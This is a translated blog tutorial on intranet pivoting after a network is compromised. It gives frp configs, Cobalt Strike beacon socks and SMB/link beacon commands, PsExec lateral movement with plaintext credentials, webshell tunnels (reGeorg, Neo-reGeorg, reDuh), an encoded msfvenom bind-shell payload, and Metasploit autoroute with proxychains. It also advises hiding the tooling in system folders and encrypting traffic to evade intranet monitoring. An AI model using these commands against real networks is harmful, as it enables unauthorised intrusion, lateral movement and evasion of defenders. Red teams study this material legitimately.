Title: Series summary of common methods for intranet penetration

Preface

When intranet penetration, a WebShell or CobaltStrike, Metasploit will be launched, etc. is just the beginning, and it is more about moving the intranet horizontally, expanding the results, and hitting the core area. However, the prerequisite for post-infiltration is to build an "exclusive channel" to the intranet in order to further attack. However, in actual combat, the use methods are different due to different network environments.

The content of this article is expanded according to the following mind map

 Target outbound (socks proxy)

This is the network environment that you are most willing to encounter in actual combat. The target machine can access the Internet normally and can directly hang the socks agent or CobaltStrike on the target machine to open up the target's intranet channel.

frp(socks5)

frp server configuration file

[common]bind_port=8080

frp client configuration file

[common]server_addr=xx.xx.xx.xxserver_port=8080#Service port Use common web ports [socks5]type=tcpremote_port=8088plugin=socks5use_encryption=trueuse_compression=true#socks5 password#plugin_user=SuperMan#plugin_passwd=XpO2McWe6nj3

The two functions of encryption and compression are added here, which are not enabled by default. According to the author's introduction, the compression algorithm uses snappy.

use_encryption=true enable encryption [Encrypted transmission of communication content, effectively preventing traffic from being intercepted]

use_compression=true Enable compression [transmitting content for compression, effectively reducing the transmitted network traffic and speeding up traffic forwarding, but it will consume some additional CPU resources]

use_encryption=true , use_compression=true must be placed under the relevant protocol.

After the frp client and configuration file are transmitted to the target machine, the program name and configuration file are modified and placed in the system-related folders to ensure concealment

setg Proxies socks5:xxx.xxx.xxx.xxx.xxx:8088

Comparison of encryption compression

This is the FRP client configuration file that does not use encryption and compression functions. The metaploit hangs the socks proxy is used to scan the data packets transmitted by ms17_010, which can clearly identify the specific attack behavior. If the target intranet has security equipment such as "situation awareness" and traffic analysis, it will be monitored, resulting in the loss of permissions.

After using encryption and compression functions, although the attack source address will also be exposed, the transmitted data packets cannot be distinguished, avoiding the security monitoring equipment in the intranet

CobaltStrike (socks4a)

Go to the Beacon of the controlled target machine to enable the socks agent

beacon socks 1024 #Port is set according to the actual situation of VPS

View Proxy Pivots in the menu bar, connect the copy proxy to Metasploit, or directly hang socks4a in related security tools.

No online machine

This is the link link. As long as the main link (beacon) is disconnected, all of them will be disconnected!

SMB Beacon

Official introduction to SMB Beacon: SMB Beacon uses a named pipe to communicate through the parent Beacon. When two Beacons are linked, the child Beacon obtains the task from the parent Beacon and sends it. Because the linked Beacons uses Windows named pipes for communication, this traffic is encapsulated in the SMB protocol, SMB Beacon is relatively hidden.

Create an SMB Listener (host and port can be ignored), pay attention to the Listener selection, and select the host-derived session that can be reached by route in the session.

(Create SMB in Listner, right-click spawn as, select the corresponding Listener to go online)

After successful operation, you can see the character ∞∞, which is the connection state of the derived SMB Beacon.

You can disconnect it with the link host link or unlink host on the main Beacon.

beacon link 192.168.144.155beacon unlink 192.168.144.155

Link Listener

Create Listener on the online host.

Export the executable file or dll corresponding to this type of Listener.

Select the Listener you just created.

Upload the paidload that has just been generated to the currently online target machine, and use the PsExec.exe tool here. (CobalStrike itself has psexec function not powerful enough)

Use the PsExec tool in Beacon to upload the payload to the target machine that does not leave the network, execute it automatically, and go online.

beacon shell C:\WINDOWS\Temp\PsExec.exe -accepteula\\192.168.144.155,192.168.144.196 -u administrator -p admin@123 -d -c C:\WINDOWS\Temp\beacon.exe

beacon shell netstat -ano |findstr 4444

SSH Login

beacon ssh 192.168.144.174:22 root adminbeacon ssh 192.168.144.203:22 root admin

Checking the network connection status in the Linux target machine is actually a connection established with the previously launched Windows host.

The target does not go out of the network (http proxy)

There may be firewalls, network gates, etc. in the target machine network, which only allows http one-way outflow and cannot access the Internet normally. The above socks method is not feasible, and it can only be used to penetrate using http proxy.

reGeorg (socks5)

python reGeorgSocksProxy.py -u http://192.168.144.211/tunnel.aspx -l 0.0.0.0 -p 10080

Using metasploit to hang reGeorg socks proxy, scan the data packets transmitted by ms17_010, which can clearly identify attack behavior.

Neo-reGeorg (encryption)

python neoreg.py -k test@123 -l 0.0.0.0 -p 10081 -u http://192.168.144.211/neo-tunnel.aspx After using Neo-reGeorg, the packet has been encrypted and transmitted.

Ice Scorpion (open socks5)

Ice Scorpion's packet transmission is encrypted and it also has the function of socks proxy, but there is packet loss during the transmission process. Here we also use metasploit to detect the ms17_010 vulnerability, but the result shows that it does not exist. When no proxy detection is set, the actual vulnerability exists.

Although the proxy scanning method of Ice Scorpion is not as accurate as reGeorg, port detection of small threads is feasible, such as auxiliary/scanner/portscan/tcp. Accuracy is more determined by the number of packets in some detection or other way of transmission.

reduh (single-port forwarding)

reduh usage: https://blog.csdn.net/nzjdsds/article/details/82930774

When the service version of the target server middleware and other services is low and reGeorg or Ice Scorpion Horse cannot resolve normally, you need to use other http proxy scripts. This is the environment encountered in a practical battle:

Take reduh as an example here. Although only forwarding the specified port (graphical connection operation is not applicable), you can first use msfvenom to generate a forward shell payload, then combine reduh single-port forwarding to launch metasploit, and finally use the socks4a module to open the proxy.

Let’s go through the specific process below:

sudo msfvenom --platform windows -p windows/shell_bind_tcp lport=53 -e x86/shikata_ga_nai -i 5 -f exe -o x86shell.exe#--platform platform Specify the target platform for payload #-e, --encoder encoder Specify the encoder to use #-i, --iterations count Specify the number of encoding times of payload

Upload the payload to the target server and execute.

metasploit is the address and port after listening for forwarding.

sudo msfconsole -qmsf5 use exploit/multi/handlermsf5 exploit(multi/handler) setpayload windows/shell_bind_tcpmsf5 exploit(multi/handler) setrhost 127.0.0.1msf5 exploit(multi/handler) setlport 5353msf5 exploit(multi/handler) run -j

java -jar reDuhClient.jar http://103.242.xx.xx/reduh.aspxtelnet 127.0.0.1 1010[createTunnel]5353:127.0.0.1:53

It can penetrate in metasploit, or turn on a socks4a, and mount other security tools to continue penetration.

msf5 exploit(multi/handler) use auxiliary/server/socks4amsf5 auxiliary(server/socks4a) setsrvport 10080msf5 auxiliary(server/socks4a) run -j

Notice

Why do payload use shell instead of meterpreter? Meterpreter is a high-level payload that occupies a large number of data packets during transmission. This single-port forwarding is not very stable at all. Meterpreter will make the "small water pipe" more unstable!

Isolated Network (Multi-level Agent)

In the intranet penetration, there will be isolated networks, which are often logically isolated. The breakthrough method is to obtain the permissions of the route-accessible springboard machine (multiple network cards, operation and maintenance machines, etc.) and establish a first-level second-level agent and a third-level agent.

frp

Now you have obtained the permission of a dual network card intranet server, and you can use FRP to establish a channel. This server is both a server and a client.

(For details, refer to https://www.cnblogs.com/PANDA-Mosen/p/13096260.html)

proxifier

After the establishment is done with FRP, add two proxyings in combination with proxifier: external network socks and internal network socks, and then create a proxy chain. (Note the proxy order)

Set proxy rules and select the corresponding proxy.

The second-layer agent was successful, and the detection of the intranet isolator 445 is opened.

Proxychains

Command line proxy artifact proxychains, setting the second-layer proxy and socks password. (Note the proxy order)

Linked metasploit, ms17_010 detection, you can see the transmission process of the proxy chain.

For the utilization of metasploit, as long as the route in sessions is accessible, multi-layer network penetration can be directly carried out, which is more convenient. But the main session is dropped, all of them are dropped!

After obtaining a session of the target, you can view the IP segment information and automatically add the routing table.

msf5 exploit(multi/handler) sessions 1meterpreter run get_local_subnetsmeterpreter run autoroute -pmeterpreter run post/multi/manage/autoroutemeterpreter run autoroute -pmeterpreter background

The above is added in the meterpreter permission, or when the target routing table information is known, you can add it directly.

msf5 exploit(multi/handler) route add 172.20.20.0/24 1//session id 1msf5 exploit(multi/handler) route

You can continue to penetrate metasploit, or turn on a socks and mount other tools to penetrate multiple layers.

msf5 exploit(multi/handler) use auxiliary/server/socks4amsf5 auxiliary(server/socks4a) setsrvport 1080msf5 auxiliary(server/socks4a) run -j and then open /etc/proxychains.conf

Original link: https://www.cnblogs.com/yokan/p/14057794.html